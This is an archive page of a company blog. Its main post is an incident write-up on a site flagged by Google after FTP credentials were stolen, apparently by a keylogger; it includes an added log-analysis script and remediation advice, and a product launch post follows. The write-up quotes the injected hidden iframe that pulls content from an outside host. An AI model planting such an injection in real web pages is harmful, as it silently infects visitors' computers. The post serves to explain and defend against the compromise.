Archive for the ‘Uncategorized’ Category

If you’re a tech person…

Thursday, May 20th, 2010

Dilbert1

Google Search Results: “This site may harm your computer”

Friday, June 12th, 2009

Google has introduced a new piece of logic into their indexing engine, which detects malware embedded within websites.  If your website has been compromised (I'll explain what 'compromised' means later), you will see "This site may harm your computer" when you search Google for your website.

Within this article we will discuss:

  1. What does it mean to have a compromised website
  2. How does a compromise occur
  3. How to resolve this issue
  4. How do I work with Google to remove the “This site may harm your computer” link

What does it mean to have a compromised website?

Recently we had a client call us with this concern.  Several of his clients contacted him and said that when they searched for his website on Google, they were presented with a link under the title of the result page that said “This site may harm your computer”.  The result looked just like this:

This site may harm your computer

How did this happen?

In this case, it is easy to look at the result of the attack and work backward toward how the attack occurred.  Here is what we know:

  1. The attacker placed the following line of code on a website file:
    <iframe src="http://filmlifeimages.cn:8080/index.php"
    width=180 height=111 style="visibility: hidden"></iframe>
  2. After consulting with the client, who had FTP access, we knew that he was not responsible for uploading a file containing this information.
  3. We noted the modification date of the file on the file system: 6/10/2009 @ 2:08am CST.
  4. We then looked at the FTP log files to understand what happened on the 10th at 2:08am.
  5. The log file showed that every page on the site was overwritten, status 226, on or around 2:08am.
  6. The account used to access the server was a valid FTP account.
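
The log review in steps 3 to 5 can be scripted. This is an added example, not code from the original article: the log layout, the account name `clientftp` and the IP addresses are constructed, and 226 is the FTP reply code for a completed transfer.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log. Assumed fields: date time client-ip user command path status,
# with timestamps in the same timezone as the file system's modification times.
SAMPLE_LOG = """\
2009-06-09 14:31:07 198.51.100.20 clientftp STOR /site/news.html 226
2009-06-10 02:07:58 203.0.113.77 clientftp USER clientftp 331
2009-06-10 02:07:59 203.0.113.77 clientftp PASS - 230
2009-06-10 02:08:01 203.0.113.77 clientftp STOR /site/index.html 226
2009-06-10 02:08:02 203.0.113.77 clientftp STOR /site/about.html 226
2009-06-10 02:08:03 203.0.113.77 clientftp STOR /site/contact.html 226
2009-06-10 02:08:04 203.0.113.77 clientftp STOR /site/news.html 226
2009-06-10 09:15:40 198.51.100.20 clientftp RETR /site/index.html 226
"""

def parse(lines):
    """Yield (timestamp, ip, user, command, path, status); skip malformed lines."""
    for line in lines:
        parts = line.split()
        if len(parts) != 7:
            continue
        try:
            ts = datetime.strptime(f"{parts[0]} {parts[1]}", "%Y-%m-%d %H:%M:%S")
            yield ts, parts[2], parts[3], parts[4].upper(), parts[5], int(parts[6])
        except ValueError:
            continue

def uploads_near(lines, file_mtime, window=timedelta(minutes=5), min_files=3):
    """Group completed uploads (STOR with 226) near file_mtime by (user, ip)."""
    sessions = defaultdict(list)
    for ts, ip, user, cmd, path, status in parse(lines):
        if cmd == "STOR" and status == 226 and abs(ts - file_mtime) <= window:
            sessions[(user, ip)].append(path)
    return {k: sorted(v) for k, v in sessions.items() if len(v) >= min_files}

def unfamiliar_sources(lines, sessions, before):
    """Return (user, ip) pairs from sessions that never appear in the log before `before`."""
    seen = {(user, ip) for ts, ip, user, *_ in parse(lines) if ts < before}
    return [key for key in sessions if key not in seen]

if __name__ == "__main__":
    log = SAMPLE_LOG.splitlines()
    mtime = datetime(2009, 6, 10, 2, 8)  # modification time noted on the altered files
    bursts = uploads_near(log, mtime)
    for user, ip in unfamiliar_sources(log, bursts, mtime - timedelta(minutes=5)):
        print(f"{user} from new source {ip}: {len(bursts[(user, ip)])} files overwritten")
```

Because the account itself is valid, the useful signals are the burst of overwrites and a source address the account has not used before.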

Based on this information, and a few other things that we collected from the client, we are 99% sure that the client’s computer was infected by a ‘keylogger’ program.  A ‘keylogger’ does exactly what it sounds like: it logs all of the keystrokes you make on your computer and oftentimes transmits the data to a computer outside of your network, which is then accessed by the hacker.

To test our ‘keylogger’ theory, we connected a dummy system to the infected website and, sure enough, we were infected with a keylogger.

How do I resolve this issue?

If you are the hosting company – you should know what to do.  Reset the FTP account password, remove ‘any’ access to port 21 on your firewall and begin restricting access by IP or VPN.

If you are the client – your computer, and potentially your network is infected with a keylogger program.  Our suggestion is that you complete the following steps immediately.

  1. If you do online banking, call your bank immediately to have your account credentials changed
  2. If you have purchased anything online recently, call your credit card companies and have them reissue you a new card.
  3. If you have provided any websites significant information about your identity, contact an identity theft company

Once you have completed the steps above, you have to remove the keylogger program from your system.  We recommend using AVAST, found at http://www.avast.com/; there are several types of software like this out on the internet.  Run a full scan of your system and remove all of the infected files.  Moving forward, you should run these types of programs constantly and conduct a full system/network scan on a routine basis.

How do I work with Google to remove the “This site may harm your computer” link?

The process to remove the “harmful” status is very basic. Navigate to this page and scroll to the bottom: http://www.google.com/support/webmasters/bin/answer.py?answer=45432

New Product Launch!

Tuesday, February 17th, 2009

Do you have part-time or hourly employees? Tired of managing their schedules? SubItUp is a great tool to assist you, and at very low cost!

Brattle is thrilled to announce the launch of SubItUp.com! This is a new way to manage a company’s schedule changes with absolute ease. SubItUp allows employees to join the company and department for which they work, upload their schedule to the site, and then begin to pick-up more shifts, offer ones they need covered, and switch shifts! This is a great new way to keep all the employees, managers, and owners of a business in the loop in regards to schedule changes. The site offers moderator abilities for owners and managers, or employees may use the site as a self-organized tool to arrange shift changes amongst themselves.

SubItUp and all of its utilities and applications were entirely developed by our talented Brattle team.  The site is currently being tested by MIT, but it is also open for use by companies country-wide. SubItUp is free for employees to use; for owners and managers, opening up the business/moderator end of the site is only $15/month.

SubItUp is the first site of its kind to incorporate three kinds of schedule changes plus the ability for managers and owners to oversee all of these changes. We are very proud of SubItUp and we encourage you to visit the site and see for yourself why we think it is going to be a breakthrough for businesses everywhere that schedule employees by the hour. No more last minute phone calls by employees to every person in the business that could pick up their shift, no more frustrated managers when no one shows up for a shift, etc. SubItUp provides a convenient, single location and mechanism to organize and manage your business’ work schedule.

Visit SubItUp.com or call us here at Brattle with any questions about how SubItUp can improve your business!